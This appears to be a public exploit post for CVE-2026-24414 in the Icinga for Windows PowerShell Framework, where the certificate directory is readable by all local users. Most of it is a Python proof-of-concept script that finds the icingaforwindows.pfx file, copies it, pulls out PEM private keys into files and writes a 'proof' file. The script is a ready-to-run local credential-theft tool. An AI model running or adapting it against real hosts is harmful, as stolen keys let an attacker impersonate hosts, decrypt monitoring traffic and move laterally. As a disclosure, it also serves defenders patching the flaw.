# Exploit Title: Icinga for Windows 1.13.3 - Incorrect Default Permissions Private Key Exposure # Date: 2026-02-23 # Exploit Author: nu11secur1ty # Vendor Homepage: https://icinga.com/ # Software Link: https://github.com/Icinga/icinga-powershell-framework/releases/tag/v1.13.3 # Version: Icinga PowerShell Framework < 1.13.4, < 1.12.4, < 1.11.2 # Tested on: Windows 11 25H2 # CVE: CVE-2026-24414 ## Description Icinga for Windows PowerShell Framework versions prior to 1.13.4, 1.12.4, and 1.11.2 install the certificate directory with insecure default permissions. The directory `C:\Program Files\WindowsPowerShell\Modules\icinga-powershell-framework\certificate` is created with `BUILTIN\Users:(RX)` permissions, allowing ANY local user to read the `icingaforwindows.pfx` certificate file containing the private key. This vulnerability leads to complete exposure of the Icinga private key, enabling attackers to: - Impersonate the monitored host - Decrypt Icinga monitoring traffic - Use the certificate for authentication to other systems - Perform lateral movement within the network ## Proof of Concept The following Python exploit demonstrates that any standard user can read and extract the private key: ```python #!/usr/bin/env python3 """ CVE-2026-24414 - Icinga for Windows Private Key Exposure Exploit Author: nu11secur1ty Tested on: Windows 11 25H2 """ import os import re import shutil import getpass from pathlib import Path from datetime import datetime # Target path cert_file = Path(r"C:\Program Files\WindowsPowerShell\Modules\icinga-powershell-framework\certificate\icingaforwindows.pfx") def main(): print("[*] CVE-2026-24414 Exploit - Icinga Private Key Exposure") print(f"[*] Running as: {getpass.getuser()}") print("-" * 60) # Check if target exists if not cert_file.exists(): print("[-] Target certificate not found") return print(f"[+] Found certificate: {cert_file}") print(f"[+] File size: {cert_file.stat().st_size} bytes") # Check permissions (visual confirmation) os.system(f'icacls "{cert_file.parent}"') # Create output directory output_dir = Path.cwd() / f"icinga_exposed_{datetime.now().strftime('%Y%m%d_%H%M%S')}" output_dir.mkdir(exist_ok=True) # Copy certificate shutil.copy2(cert_file, output_dir / "original_certificate.pfx") print(f"[+] Certificate copied to: {output_dir / 'original_certificate.pfx'}") # Try to extract private key with open(cert_file, 'rb') as f: data = f.read() # Look for PEM private key try: text_data = data.decode('utf-8', errors='ignore') pattern = r'-----BEGIN.*PRIVATE KEY-----.*?-----END.*PRIVATE KEY-----' keys = re.findall(pattern, text_data, re.DOTALL) if keys: for i, key in enumerate(keys, 1): key_file = output_dir / f"private_key_{i}.key" with open(key_file, 'w') as kf: kf.write(key) print(f"[+] Private key extracted: {key_file}") print(f"[+] Key preview:\n{key[:200]}...") else: print("[!] No PEM key found - certificate may be binary") print(f"[+] Raw certificate saved for analysis") except: print("[!] Binary certificate saved - may contain private key in DER format") print("\n" + "="*60) print("[!] VULNERABILITY CONFIRMED!") print("[!] ANY local user can read this private key") print("[!] CVE-2026-24414 - Incorrect Default Permissions") print("="*60) # Show dangerous permissions print("\n[!] CRITICAL: Check the permissions above") print("[!] Look for: BUILTIN\\Users:(I)(RX) - THIS IS THE VULNERABILITY") # Create proof file proof = output_dir / "PROOF.txt" with open(proof, 'w') as f: f.write(f"CVE-2026-24414 Exploit Success\n") f.write(f"Date: {datetime.now()}\n") f.write(f"User: {getpass.getuser()}\n") f.write(f"Certificate: {cert_file}\n") f.write("Private Key: EXTRACTED\n") f.write("Impact: ANY local user can steal this key\n") print(f"\n[+] Proof file created: {proof}") if __name__ == "__main__": main()